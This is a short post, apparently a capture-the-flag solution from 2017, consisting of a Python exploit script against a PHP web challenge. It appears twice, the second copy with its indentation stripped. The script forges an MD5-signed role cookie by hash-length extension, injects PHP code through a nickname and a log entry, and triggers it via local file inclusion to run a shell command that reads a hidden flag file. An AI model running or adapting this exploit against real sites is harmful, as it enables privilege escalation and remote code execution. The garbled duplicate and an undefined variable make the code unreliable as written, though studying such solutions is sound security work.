HarDToBelieve · December 20, 2017 16:49
diff --git a/exploit.py b/exploit.py
 import requests
 import sys
 from subprocess import Popen, PIPE
 import urllib
 from base64 import b64decode, b64encode
 from pprint import pprint

 url = 'http://xxx.hardtobelieve.me/'   # Sorry I have to hide my challenge server, because this is a RCE challenge :D
 proxy = {'http': 'http://localhost:8080'}
 s = requests.Session()
 # ---------------- Registration ----------------

 reg_url = url + 'register.php'
 data = {
 	'username' : 'testExploit\n',
 	'nickname' : '<?=//',
 	'password' : 'testExploit'
 }
 result = s.post(reg_url, data=data)
 if "id='error'" in result.text:
 	print '[-] Register failed'
 	sys.exit()
 else:
 	print '[+] Register successfully'

 # ----------------------------------------------


 # ---------------- Login ----------------

 login_url = url + 'login.php'
 data = {
 	'username' : 'testExploit\n',
 	'password' : 'testExploit'
 }
 result = s.post(login_url, data=data)
 if 'Menu' not in result.text:
 	print '[-] Login failed'
 	sys.exit()
 else:
 	print '[+] Login successfully'

 oldAuth = urllib.unquote(urllib.unquote(s.cookies.get_dict()['data']))
 oldSig = s.cookies.get_dict()['signature']

 print '[+] Old auth:', oldAuth
 print '[+] Old Signature:', oldSig

 # ----------------------------------------

 # ---------------- Change role ----------------

 process = Popen(['./hash_extender/hash_extender', '--data', b64decode(oldAuth), \
 				'--secret-min', '1','--secret-max', \
 				'20', '--append', ';role=member;suffix=hacked;', '--signature', oldSig, \
 				'--format', 'md5'], stdout=PIPE, stderr=PIPE)

 stdout, stderr = process.communicate()
 index_url = url + 'index.php'

 s = None
 secret_len = None

 for tries in stdout.split('\n\n')[:-1]:
 	tmpDict = {}
 	for line in tries.split('\n'):
 		tmpVal = line.split(': ')
 		tmpDict[tmpVal[0]] = tmpVal[1]

 	s = requests.Session()
 	s.cookies.set('data', b64encode(tmpDict['New string'].decode('hex')))
 	s.cookies.set('signature', tmpDict['New signature'])
 	result = s.get(index_url, cookies=cookie)
 	secret_len = tmpDict['Secret length']
 	if 'member' in result.text:
 		print '[+] New Signature:', tmpDict['New signature']
 		print '[+] Got premium account'
 		break

 if s is None:
 	print '[-] Cannot get premium account'
 	sys.exit()

 # print '[-] Debug:', b64encode(tmpDict['New string'].decode('hex'))
 print secret_len
 # ---------------------------------------------

 # ---------------- Read file ----------------

 def lfi(path, cmd=''):
 	food_url = url + 'foods.php'
 	param = {
 		'page' : path
 	}
 	data = {
 		'c' : cmd
 	}
 	process = Popen(['./hash_extender/hash_extender', '--data', b64decode(oldAuth), \
 				'--secret', secret_len, '--append', ';role=member;suffix=poc;username=hacker', \
 				'--signature', oldSig, \
 				'--format', 'md5'], stdout=PIPE, stderr=PIPE)
 	stdout, stderr = process.communicate()
 	ss = requests.Session()
 	
 	tmpDict = {}
 	for line in stdout.split('\n\n')[0].split('\n'):
 		tmpVal = line.split(': ')
 		tmpDict[tmpVal[0]] = tmpVal[1]

 	ss.cookies.set('data', b64encode(tmpDict['New string'].decode('hex')))
 	ss.cookies.set('signature', tmpDict['New signature'])
 	result = ss.post(food_url, params=param, data=data)
 	return result.text

 # --------------------------------------------

 # ---------------- Inject code ----------------

 log_path = 'GmQrH5RBZSGizH7EjLl'
 log_file = 'testExploit\n_hacked'

 # Use burp to modify method
 s.post(url + "*index.php?*/['c']('cat</home/web300/I_am_SURE_you_cant_guess_this_file_N4M3');?>", proxies=proxy)

 print lfi(log_path + '/' + log_file, 'exec')
	import requests
	import sys
	from subprocess import Popen, PIPE
	import urllib
	from base64 import b64decode, b64encode
	from pprint import pprint

	url = 'http://xxx.hardtobelieve.me/' # Sorry I have to hide my challenge server, because this is a RCE challenge :D
	proxy = {'http': 'http://localhost:8080'}
	s = requests.Session()
	# ---------------- Registration ----------------

	reg_url = url + 'register.php'
	data = {
	'username' : 'testExploit\n',
	'nickname' : '<?=//',
	'password' : 'testExploit'
	}
	result = s.post(reg_url, data=data)
	if "id='error'" in result.text:
	print '[-] Register failed'
	sys.exit()
	else:
	print '[+] Register successfully'

	# ----------------------------------------------


	# ---------------- Login ----------------

	login_url = url + 'login.php'
	data = {
	'username' : 'testExploit\n',
	'password' : 'testExploit'
	}
	result = s.post(login_url, data=data)
	if 'Menu' not in result.text:
	print '[-] Login failed'
	sys.exit()
	else:
	print '[+] Login successfully'

	oldAuth = urllib.unquote(urllib.unquote(s.cookies.get_dict()['data']))
	oldSig = s.cookies.get_dict()['signature']

	print '[+] Old auth:', oldAuth
	print '[+] Old Signature:', oldSig

	# ----------------------------------------

	# ---------------- Change role ----------------

	process = Popen(['./hash_extender/hash_extender', '--data', b64decode(oldAuth), \
	'--secret-min', '1','--secret-max', \
	'20', '--append', ';role=member;suffix=hacked;', '--signature', oldSig, \
	'--format', 'md5'], stdout=PIPE, stderr=PIPE)

	stdout, stderr = process.communicate()
	index_url = url + 'index.php'

	s = None
	secret_len = None

	for tries in stdout.split('\n\n')[:-1]:
	tmpDict = {}
	for line in tries.split('\n'):
	tmpVal = line.split(': ')
	tmpDict[tmpVal[0]] = tmpVal[1]

	s = requests.Session()
	s.cookies.set('data', b64encode(tmpDict['New string'].decode('hex')))
	s.cookies.set('signature', tmpDict['New signature'])
	result = s.get(index_url, cookies=cookie)
	secret_len = tmpDict['Secret length']
	if 'member' in result.text:
	print '[+] New Signature:', tmpDict['New signature']
	print '[+] Got premium account'
	break

	if s is None:
	print '[-] Cannot get premium account'
	sys.exit()

	# print '[-] Debug:', b64encode(tmpDict['New string'].decode('hex'))
	print secret_len
	# ---------------------------------------------

	# ---------------- Read file ----------------

	def lfi(path, cmd=''):
	food_url = url + 'foods.php'
	param = {
	'page' : path
	}
	data = {
	'c' : cmd
	}
	process = Popen(['./hash_extender/hash_extender', '--data', b64decode(oldAuth), \
	'--secret', secret_len, '--append', ';role=member;suffix=poc;username=hacker', \
	'--signature', oldSig, \
	'--format', 'md5'], stdout=PIPE, stderr=PIPE)
	stdout, stderr = process.communicate()
	ss = requests.Session()

	tmpDict = {}
	for line in stdout.split('\n\n')[0].split('\n'):
	tmpVal = line.split(': ')
	tmpDict[tmpVal[0]] = tmpVal[1]

	ss.cookies.set('data', b64encode(tmpDict['New string'].decode('hex')))
	ss.cookies.set('signature', tmpDict['New signature'])
	result = ss.post(food_url, params=param, data=data)
	return result.text

	# --------------------------------------------

	# ---------------- Inject code ----------------

	log_path = 'GmQrH5RBZSGizH7EjLl'
	log_file = 'testExploit\n_hacked'

	# Use burp to modify method
	s.post(url + "index.php?/['c']('cat</home/web300/I_am_SURE_you_cant_guess_this_file_N4M3');?>", proxies=proxy)

	print lfi(log_path + '/' + log_file, 'exec')